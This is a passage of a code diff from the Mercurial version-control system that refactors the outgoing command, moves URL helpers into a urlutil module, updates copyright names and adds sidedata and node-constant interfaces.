_outgoing(ui, repo, dests, opts, subpath=None): + out = set() + others = [] + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + dest = bytes(subpath) + else: + p = urlutil.url(dest) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + dest = bytes(p) + branches = path.branch, opts.get(b'branch') or [] + + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) + revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) + if revs: + revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) - if revs: - revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] + other = peer(repo, opts, dest) + try: + outgoing = discovery.findcommonoutgoing( + repo, other, revs, force=opts.get(b'force') + ) + o = outgoing.missing + out.update(o) + if not o: + scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) + others.append(other) + except: # re-raises + other.close() + raise + # make sure this is ordered by revision number + outgoing_revs = list(out) + cl = repo.changelog + outgoing_revs.sort(key=cl.rev) + return outgoing_revs, others - other = peer(repo, opts, dest) - outgoing = discovery.findcommonoutgoing( - repo, other, revs, force=opts.get(b'force') - ) - o = outgoing.missing - if not o: - scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) - return o, other + +def _outgoing_recurse(ui, repo, dests, opts): + ret = 1 + if opts.get(b'subrepos'): + ctx = repo[None] + for subpath in sorted(ctx.substate): + sub = ctx.sub(subpath) + ret = min(ret, sub.outgoing(ui, dests, opts)) + return ret -def outgoing(ui, repo, dest, opts): - def recurse(): - ret = 1 - if opts.get(b'subrepos'): - ctx = repo[None] - for subpath in sorted(ctx.substate): - sub = ctx.sub(subpath) - ret = min(ret, sub.outgoing(ui, dest, opts)) - return ret - +def _outgoing_filter(repo, revs, opts): + """apply revision filtering/ordering option for outgoing""" limit = logcmdutil.getlimit(opts) - o, other = _outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return recurse() - + no_merges = opts.get(b'no_merges') if opts.get(b'newest_first'): - o.reverse() - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + revs.reverse() + if limit is None and not no_merges: + for r in revs: + yield r + return + count = 0 - for n in o: + cl = repo.changelog + for n in revs: if limit is not None and count >= limit: break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: + parents = [p for p in cl.parents(n) if p != nullid] + if no_merges and len(parents) == 2: continue count += 1 - displayer.show(repo[n]) - displayer.close() - cmdutil.outgoinghooks(ui, repo, other, opts, o) - recurse() - return 0 # exit code is zero since we found outgoing changes + yield n + + +def outgoing(ui, repo, dests, opts, subpath=None): + if opts.get(b'graph'): + logcmdutil.checkunsupportedgraphflags([], opts) + o, others = _outgoing(ui, repo, dests, opts, subpath=subpath) + ret = 1 + try: + if o: + ret = 0 + + if opts.get(b'graph'): + revdag = logcmdutil.graphrevs(repo, o, opts) + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer( + ui, repo, opts, buffered=True + ) + logcmdutil.displaygraph( + ui, repo, revdag, displayer, graphmod.asciiedges + ) + else: + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + for n in _outgoing_filter(repo, o, opts): + displayer.show(repo[n]) + displayer.close() + for oth in others: + cmdutil.outgoinghooks(ui, repo, oth, opts, o) + ret = min(ret, _outgoing_recurse(ui, repo, dests, opts)) + return ret # exit code is zero since we found outgoing changes + finally: + for oth in others: + oth.close() def verify(repo, level=None): diff --git a/mercurial/hgweb/__init__.py b/mercurial/hgweb/__init__.py --- a/mercurial/hgweb/__init__.py +++ b/mercurial/hgweb/__init__.py @@ -1,7 +1,7 @@ # hgweb/__init__.py - web interface to a mercurial repository # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005 Matt Mackall <mpm@selenic.com> +# Copyright 2005 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/common.py b/mercurial/hgweb/common.py --- a/mercurial/hgweb/common.py +++ b/mercurial/hgweb/common.py @@ -1,7 +1,7 @@ # hgweb/common.py - Utility functions needed by hgweb_mod and hgwebdir_mod # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgweb_mod.py b/mercurial/hgweb/hgweb_mod.py --- a/mercurial/hgweb/hgweb_mod.py +++ b/mercurial/hgweb/hgweb_mod.py @@ -1,7 +1,7 @@ # hgweb/hgweb_mod.py - Web interface for a repository. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgwebdir_mod.py b/mercurial/hgweb/hgwebdir_mod.py --- a/mercurial/hgweb/hgwebdir_mod.py +++ b/mercurial/hgweb/hgwebdir_mod.py @@ -1,7 +1,7 @@ # hgweb/hgwebdir_mod.py - Web interface for a directory of repositories. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -1,7 +1,7 @@ # hgweb/request.py - An http request from either CGI or the standalone server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -17,6 +17,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) class multidict(object): @@ -184,7 +187,7 @@ reponame = env.get(b'REPO_NAME') if altbaseurl: - altbaseurl = util.url(altbaseurl) + altbaseurl = urlutil.url(altbaseurl) # https://www.python.org/dev/peps/pep-0333/#environ-variables defines # the environment variables. diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -1,7 +1,7 @@ # hgweb/server.py - The standalone hg web server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -28,6 +28,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) httpservermod = util.httpserver socketserver = util.socketserver @@ -431,7 +434,7 @@ sys.setdefaultencoding(oldenc) address = ui.config(b'web', b'address') - port = util.getport(ui.config(b'web', b'port')) + port = urlutil.getport(ui.config(b'web', b'port')) try: return cls(ui, app, (address, port), handler) except socket.error as inst: diff --git a/mercurial/hgweb/webcommands.py b/mercurial/hgweb/webcommands.py --- a/mercurial/hgweb/webcommands.py +++ b/mercurial/hgweb/webcommands.py @@ -1,6 +1,6 @@ # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/webutil.py b/mercurial/hgweb/webutil.py --- a/mercurial/hgweb/webutil.py +++ b/mercurial/hgweb/webutil.py @@ -1,7 +1,7 @@ # hgweb/webutil.py - utility library for the web interface. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hook.py b/mercurial/hook.py --- a/mercurial/hook.py +++ b/mercurial/hook.py @@ -1,6 +1,6 @@ # hook.py - hook support for mercurial # -# Copyright 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -1,6 +1,6 @@ # httpconnection.py - urllib2 handler for new http support # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # Copyright 2011 Google, Inc. @@ -18,6 +18,10 @@ pycompat, util, ) +from .utils import ( + urlutil, +) + urlerr = util.urlerr urlreq = util.urlreq @@ -99,7 +103,7 @@ if not prefix: continue - prefixurl = util.url(prefix) + prefixurl = urlutil.url(prefix) if prefixurl.user and prefixurl.user != user: # If a username was set in the prefix, it must match the username in # the URI. diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -1,6 +1,6 @@ # httppeer.py - HTTP repository proxy classes for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the @@ -38,6 +38,7 @@ from .utils import ( cborutil, stringutil, + urlutil, ) httplib = util.httplib @@ -171,9 +172,9 @@ # Send arguments via HTTP headers. if headersize > 0: # The headers can typically carry more data than the URL. - encargs = urlreq.urlencode(sorted(args.items())) + encoded_args = urlreq.urlencode(sorted(args.items())) for header, value in encodevalueinheaders( - encargs, b'X-HgArg', headersize + encoded_args, b'X-HgArg', headersize ): headers[header] = value # Send arguments via query string (Mercurial <1.9). @@ -305,7 +306,7 @@ except httplib.HTTPException as inst: ui.debug( b'http error requesting %s\n' - % util.hidepassword(req.get_full_url()) + % urlutil.hidepassword(req.get_full_url()) ) ui.traceback() raise IOError(None, inst) @@ -352,14 +353,14 @@ except AttributeError: proto = pycompat.bytesurl(resp.headers.get('content-type', '')) - safeurl = util.hidepassword(baseurl) + safeurl = urlutil.hidepassword(baseurl) if proto.startswith(b'application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. if not proto.startswith(b'application/mercurial-'): - ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl)) + ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl)) msg = _( b"'%s' does not appear to be an hg repository:\n" b"---%%<--- (%s)\n%s\n---%%<---\n" @@ -1058,7 +1059,7 @@ ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. """ - u = util.url(path) + u = urlutil.url(path) if u.query or u.fragment: raise error.Abort( _(b'unsupported URL component: "%s"') % (u.query or u.fragment) diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -1,6 +1,6 @@ # i18n.py - internationalization support for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -19,6 +19,13 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + List, + ) + + # modelled after templater.templatepath: if getattr(sys, 'frozen', None) is not None: module = pycompat.sysexecutable @@ -40,7 +47,10 @@ try: import ctypes + # pytype: disable=module-attr langid = ctypes.windll.kernel32.GetUserDefaultUILanguage() + # pytype: enable=module-attr + _languages = [locale.windows_locale[langid]] except (ImportError, AttributeError, KeyError): # ctypes not found or unknown langid @@ -51,7 +61,7 @@ localedir = os.path.join(datapath, 'locale') t = gettextmod.translation('hg', localedir, _languages, fallback=True) try: - _ugettext = t.ugettext + _ugettext = t.ugettext # pytype: disable=attribute-error except AttributeError: _ugettext = t.gettext @@ -60,6 +70,7 @@ def gettext(message): + # type: (bytes) -> bytes """Translate message. The message is looked up in the catalog to get a Unicode string, @@ -77,7 +88,7 @@ if message not in cache: if type(message) is pycompat.unicode: # goofy unicode docstrings in test - paragraphs = message.split(u'\n\n') + paragraphs = message.split(u'\n\n') # type: List[pycompat.unicode] else: # should be ascii, but we have unicode docstrings in test, which # are converted to utf-8 bytes on Python 3. @@ -110,6 +121,6 @@ if _plain(): - _ = lambda message: message + _ = lambda message: message # type: Callable[[bytes], bytes] else: _ = gettext diff --git a/mercurial/interfaces/dirstate.py b/mercurial/interfaces/dirstate.py --- a/mercurial/interfaces/dirstate.py +++ b/mercurial/interfaces/dirstate.py @@ -8,7 +8,7 @@ class idirstate(interfaceutil.Interface): - def __init__(opener, ui, root, validate, sparsematchfn): + def __init__(opener, ui, root, validate, sparsematchfn, nodeconstants): """Create a new dirstate object. opener is an open()-like callable that can be used to open the diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -453,6 +453,10 @@ """ ) + sidedata = interfaceutil.Attribute( + """Raw sidedata bytes for the given revision.""" + ) + class ifilerevisionssequence(interfaceutil.Interface): """Contains index data for all revisions of a file. @@ -519,6 +523,10 @@ * Metadata to facilitate storage. """ + nullid = interfaceutil.Attribute( + """node for the null revision for use as delta base.""" + ) + def __len__(): """Obtain the number of revisions stored for this file.""" @@ -734,7 +742,7 @@ flags=0, cachedelta=None, ): - """Add a new revision to the store. + """Add a new revision to the store and return its number. This is similar to ``add()`` except it operates at a lower level. @@ -769,7 +777,14 @@ ``nullid``, in which case the header from the delta can be ignored and the delta used as the fulltext. - ``addrevisioncb`` should be called for each node as it is committed. + ``alwayscache`` instructs the lower layers to cache the content of the + newly added revision, even if it needs to be explicitly computed. + This used to be the default when ``addrevisioncb`` was provided up to + Mercurial 5.8. + + ``addrevisioncb`` should be called for each new rev as it is committed. + ``duplicaterevisioncb`` should be called for all revs with a + pre-existing node. ``maybemissingparents`` is a bool indicating whether the incoming data may reference parents/ancestor revisions that aren't present. @@ -1132,6 +1147,10 @@ class imanifeststorage(interfaceutil.Interface): """Storage interface for manifest data.""" + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + tree = interfaceutil.Attribute( """The path to the directory this manifest tracks. @@ -1355,6 +1374,10 @@ tree manifests. """ + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + def __getitem__(node): """Obtain a manifest instance for a given binary node. @@ -1423,6 +1446,13 @@ This currently captures the reality of things - not how things should be. """ + nodeconstants = interfaceutil.Attribute( + """Constant nodes matching the hash function used by the repository.""" + ) + nullid = interfaceutil.Attribute( + """null revision for the hash function used by the repository.""" + ) + supportedformats = interfaceutil.Attribute( """Set of requirements that apply to stream clone. @@ -1641,6 +1671,14 @@ def revbranchcache(): pass + def register_changeset(rev, changelogrevision): + """Extension point for caches for new nodes. + + Multiple consumers are expected to need parts of the changelogrevision, + so it is provided as optimization to avoid duplicate lookups. A simple + cache would be fragile when other revisions are accessed, too.""" + pass + def branchtip(branchtip, ignoremissing=False): """Return the tip node for a given branch.""" @@ -1813,6 +1851,12 @@ def savecommitmessage(text): pass + def register_sidedata_computer(kind, category, keys, computer): + pass + + def register_wanted_sidedata(category): + pass + class completelocalrepository( ilocalrepositorymain, ilocalrepositoryfilestorage diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -1,6 +1,6 @@ # localrepo.py - read/write repository class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -21,6 +21,7 @@ hex, nullid, nullrev, + sha1nodeconstants, short, ) from .pycompat import ( @@ -49,6 +50,7 @@ match as matchmod, mergestate as mergestatemod, mergeutil, + metadata as metadatamod, namespaces, narrowspec, obsolete, @@ -71,6 +73,7 @@ txnutil, util, vfs as vfsmod, + wireprototypes, ) from .interfaces import ( @@ -82,9 +85,13 @@ hashutil, procutil, stringutil, + urlutil, ) -from .revlogutils import constants as revlogconst +from .revlogutils import ( + concurrency_checker as revlogchecker, + constants as revlogconst, +) release = lockmod.release urlerr = util.urlerr @@ -270,6 +277,11 @@ caps = moderncaps.copy() self._repo = repo.filtered(b'served') self.ui = repo.ui + + if repo._wanted_sidedata: + formatted = bundle2.format_remote_wanted_sidedata(repo) + caps.add(b'exp-wanted-sidedata=' + formatted) + self._caps = repo._restrictcapabilities(caps) # Begin of _basepeer interface. @@ -313,7 +325,13 @@ ) def getbundle( - self, source, heads=None, common=None, bundlecaps=None, **kwargs + self, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): chunks = exchange.getbundlechunks( self._repo, @@ -321,6 +339,7 @@ heads=heads, common=common, bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, **kwargs )[1] cb = util.chunkbuffer(chunks) @@ -452,7 +471,7 @@ # ``.hg/`` for ``relshared``. sharedpath = hgvfs.read(b'sharedpath').rstrip(b'\n') if requirementsmod.RELATIVE_SHARED_REQUIREMENT in requirements: - sharedpath = hgvfs.join(sharedpath) + sharedpath = util.normpath(hgvfs.join(sharedpath)) sharedvfs = vfsmod.vfs(sharedpath, realpath=True) @@ -939,11 +958,10 @@ def makestore(requirements, path, vfstype): """Construct a storage object for a repository.""" - if b'store' in requirements: - if b'fncache' in requirements: - return storemod.fncachestore( - path, vfstype, b'dotencode' in requirements - ) + if requirementsmod.STORE_REQUIREMENT in requirements: + if requirementsmod.FNCACHE_REQUIREMENT in requirements: + dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements + return storemod.fncachestore(path, vfstype, dotencode) return storemod.encodedstore(path, vfstype) @@ -971,7 +989,7 @@ # opener options for it because those options wouldn't do anything # meaningful on such old repos. if ( - b'revlogv1' in requirements + requirementsmod.REVLOGV1_REQUIREMENT in requirements or requirementsmod.REVLOGV2_REQUIREMENT in requirements ): options.update(resolverevlogstorevfsoptions(ui, requirements, features)) @@ -995,12 +1013,12 @@ options = {} options[b'flagprocessors'] = {} - if b'revlogv1' in requirements: + if requirementsmod.REVLOGV1_REQUIREMENT in requirements: options[b'revlogv1'] = True if requirementsmod.REVLOGV2_REQUIREMENT in requirements: options[b'revlogv2'] = True - if b'generaldelta' in requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in requirements: options[b'generaldelta'] = True # experimental config: format.chunkcachesize @@ -1196,8 +1214,8 @@ # being successful (repository sizes went up due to worse delta # chains), and the code was deleted in 4.6. supportedformats = { - b'revlogv1', - b'generaldelta', + requirementsmod.REVLOGV1_REQUIREMENT, + requirementsmod.GENERALDELTA_REQUIREMENT, requirementsmod.TREEMANIFEST_REQUIREMENT, requirementsmod.COPIESSDC_REQUIREMENT, requirementsmod.REVLOGV2_REQUIREMENT, @@ -1208,11 +1226,11 @@ requirementsmod.SHARESAFE_REQUIREMENT, } _basesupported = supportedformats | { - b'store', - b'fncache', + requirementsmod.STORE_REQUIREMENT, + requirementsmod.FNCACHE_REQUIREMENT, requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, - b'dotencode', + requirementsmod.DOTENCODE_REQUIREMENT, requirementsmod.SPARSE_REQUIREMENT, requirementsmod.INTERNAL_PHASE_REQUIREMENT, } @@ -1315,6 +1333,8 @@ self.vfs = hgvfs self.path = hgvfs.base self.requirements = requirements + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid self.supported = supportedrequirements self.sharedpath = sharedpath self.store = store @@ -1386,6 +1406,10 @@ if requirementsmod.COPIESSDC_REQUIREMENT in self.requirements: self.filecopiesmode = b'changeset-sidedata' + self._wanted_sidedata = set() + self._sidedata_computers = {} + metadatamod.set_sidedata_spec_for_repo(self) + def _getvfsward(self, origfunc): """build a ward for self.vfs""" rref = weakref.ref(self) @@ -1473,6 +1497,8 @@ bundle2.getrepocaps(self, role=b'client') ) caps.add(b'bundle2=' + urlreq.quote(capsblob)) + if self.ui.configbool(b'experimental', b'narrow'): + caps.add(wireprototypes.NARROWCAP) return caps # Don't cache auditor/nofsauditor, or you'll end up with reference cycle: @@ -1639,7 +1665,10 @@ def changelog(self): # load dirstate before changelog to avoid race see issue6303 self.dirstate.prefetch_parents() - return self.store.changelog(txnutil.mayhavepending(self.root)) + return self.store.changelog( + txnutil.mayhavepending(self.root), + concurrencychecker=revlogchecker.get_checker(self.ui, b'changelog'), + ) @storecache(b'00manifest.i') def manifestlog(self): @@ -1654,7 +1683,12 @@ sparsematchfn = lambda: sparse.matcher(self) return dirstate.dirstate( - self.vfs, self.ui, self.root, self._dirstatevalidate, sparsematchfn + self.vfs, + self.ui, + self.root, + self._dirstatevalidate, + sparsematchfn, + self.nodeconstants, ) def _dirstatevalidate(self, node): @@ -2059,6 +2093,9 @@ self._revbranchcache = branchmap.revbranchcache(self.unfiltered()) return self._revbranchcache + def register_changeset(self, rev, changelogrevision): + self.revbranchcache().setdata(rev, changelogrevision) + def branchtip(self, branch, ignoremissing=False): """return the tip node for a given branch @@ -3326,6 +3363,22 @@ fp.close() return self.pathto(fp.name[len(self.root) + 1 :]) + def register_wanted_sidedata(self, category): + self._wanted_sidedata.add(pycompat.bytestr(category)) + + def register_sidedata_computer(self, kind, category, keys, computer): + if kind not in (b"changelog", b"manifest", b"filelog"): + msg = _(b"unexpected revlog kind '%s'.") + raise error.ProgrammingError(msg % kind) + category = pycompat.bytestr(category) + if category in self._sidedata_computers.get(kind, []): + msg = _( + b"cannot register a sidedata computer twice for category '%s'." + ) + raise error.ProgrammingError(msg % category) + self._sidedata_computers.setdefault(kind, {}) + self._sidedata_computers[kind][category] = (keys, computer) + # used to avoid circular references so destructors work def aftertrans(files): @@ -3352,7 +3405,7 @@ def instance(ui, path, create, intents=None, createopts=None): - localpath = util.urllocalpath(path) + localpath = urlutil.urllocalpath(path) if create: createrepository(ui, localpath, createopts=createopts) @@ -3410,18 +3463,20 @@ % createopts[b'backend'] ) - requirements = {b'revlogv1'} + requirements = {requirementsmod.REVLOGV1_REQUIREMENT} if ui.configbool(b'format', b'usestore'): - requirements.add(b'store') + requirements.add(requirementsmod.STORE_REQUIREMENT) if ui.configbool(b'format', b'usefncache'): - requirements.add(b'fncache') + requirements.add(requirementsmod.FNCACHE_REQUIREMENT) if ui.configbool(b'format', b'dotencode'): - requirements.add(b'dotencode') + requirements.add(requirementsmod.DOTENCODE_REQUIREMENT) compengines = ui.configlist(b'format', b'revlog-compression') for compengine in compengines: if compengine in util.compengines: - break + engine = util.compengines[compengine] + if engine.available() and engine.revlogheader(): + break else: raise error.Abort( _( @@ -3442,15 +3497,19 @@ requirements.add(b'exp-compression-%s' % compengine) if scmutil.gdinitconfig(ui): - requirements.add(b'generaldelta') + requirements.add(requirementsmod.GENERALDELTA_REQUIREMENT) if ui.configbool(b'format', b'sparse-revlog'): requirements.add(requirementsmod.SPARSEREVLOG_REQUIREMENT) # experimental config: format.exp-use-side-data if ui.configbool(b'format', b'exp-use-side-data'): + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) # experimental config: format.exp-use-copies-side-data-changeset if ui.configbool(b'format', b'exp-use-copies-side-data-changeset'): + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) requirements.add(requirementsmod.COPIESSDC_REQUIREMENT) if ui.configbool(b'experimental', b'treemanifest'): @@ -3458,9 +3517,9 @@ revlogv2 = ui.config(b'experimental', b'revlogv2') if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': - requirements.remove(b'revlogv1') + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. - requirements.discard(b'generaldelta') + requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT) requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) # experimental config: format.internal-phase if ui.configbool(b'format', b'internal-phase'): @@ -3494,7 +3553,7 @@ dropped = set() - if b'store' not in requirements: + if requirementsmod.STORE_REQUIREMENT not in requirements: if bookmarks.BOOKMARKS_IN_STORE_REQUIREMENT in requirements: ui.warn( _( @@ -3617,6 +3676,7 @@ if createopts.get(b'sharedrelative'): try: sharedpath = os.path.relpath(sharedpath, hgvfs.base) + sharedpath = util.pconvert(sharedpath) except (IOError, ValueError) as e: # ValueError is raised on Windows if the drive letters differ # on each path. @@ -3633,7 +3693,8 @@ hgvfs.mkdir(b'cache') hgvfs.mkdir(b'wcache') - if b'store' in requirements and b'sharedrepo' not in createopts: + has_store = requirementsmod.STORE_REQUIREMENT in requirements + if has_store and b'sharedrepo' not in createopts: hgvfs.mkdir(b'store') # We create an invalid changelog outside the store so very old @@ -3642,11 +3703,11 @@ # effectively locks out old clients and prevents them from # mucking with a repo in an unknown format. # - # The revlog header has version 2, which won't be recognized by + # The revlog header has version 65535, which won't be recognized by # such old clients. hgvfs.append( b'00changelog.i', - b'\0\0\0\2 dummy changelog to prevent using the old repo ' + b'\0\0\xFF\xFF dummy changelog to prevent using the old repo ' b'layout', ) diff --git a/mercurial/lock.py b/mercurial/lock.py --- a/mercurial/lock.py +++ b/mercurial/lock.py @@ -1,6 +1,6 @@ # lock.py - simple advisory locking scheme for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -1,6 +1,6 @@ # logcmdutil.py - utility for log-like commands # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -14,6 +14,7 @@ from .i18n import _ from .node import ( nullid, + nullrev, wdirid, wdirrev, ) @@ -27,6 +28,7 @@ graphmod, match as matchmod, mdiff, + merge, patch, pathutil, pycompat, @@ -74,6 +76,36 @@ return limit +def diff_parent(ctx): + """get the context object to use as parent when diffing + + + If diff.merge is enabled, an overlayworkingctx of the auto-merged parents will be returned. + """ + repo = ctx.repo() + if repo.ui.configbool(b"diff", b"merge") and ctx.p2().rev() != nullrev: + # avoid cycle context -> subrepo -> cmdutil -> logcmdutil + from . import context + + wctx = context.overlayworkingctx(repo) + wctx.setbase(ctx.p1()) + with repo.ui.configoverride( + { + ( + b"ui", + b"forcemerge", + ): b"internal:merge3-lie-about-conflicts", + }, + b"merge-diff", + ): + repo.ui.pushbuffer() + merge.merge(ctx.p2(), wc=wctx) + repo.ui.popbuffer() + return wctx + else: + return ctx.p1() + + def diffordiffstat( ui, repo, @@ -217,7 +249,7 @@ ui, ctx.repo(), diffopts, - ctx.p1(), + diff_parent(ctx), ctx, match=self._makefilematcher(ctx), stat=stat, diff --git a/mercurial/logexchange.py b/mercurial/logexchange.py --- a/mercurial/logexchange.py +++ b/mercurial/logexchange.py @@ -15,6 +15,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) # directory name in .hg/ in which remotenames files will be present remotenamedir = b'logexchange' @@ -117,7 +120,7 @@ # represent the remotepath with user defined path name if exists for path, url in repo.ui.configitems(b'paths'): # remove auth info from user defined url - noauthurl = util.removeauth(url) + noauthurl = urlutil.removeauth(url) # Standardize on unix style paths, otherwise some {remotenames} end up # being an absolute path on Windows. diff --git a/mercurial/loggingutil.py b/mercurial/loggingutil.py --- a/mercurial/loggingutil.py +++ b/mercurial/loggingutil.py @@ -10,7 +10,10 @@ import errno -from . import pycompat +from . import ( + encoding, + pycompat, +) from .utils import ( dateutil, @@ -32,7 +35,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot remove '%s': %s\n" - % (newpath, err.strerror) + % (newpath, encoding.strtolocal(err.strerror)) ) try: if newpath: @@ -41,7 +44,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot rename '%s' to '%s': %s\n" - % (newpath, oldpath, err.strerror) + % (newpath, oldpath, encoding.strtolocal(err.strerror)) ) if maxsize > 0: diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -1,6 +1,6 @@ # mail.py - mail sending bits for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -34,6 +34,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) if 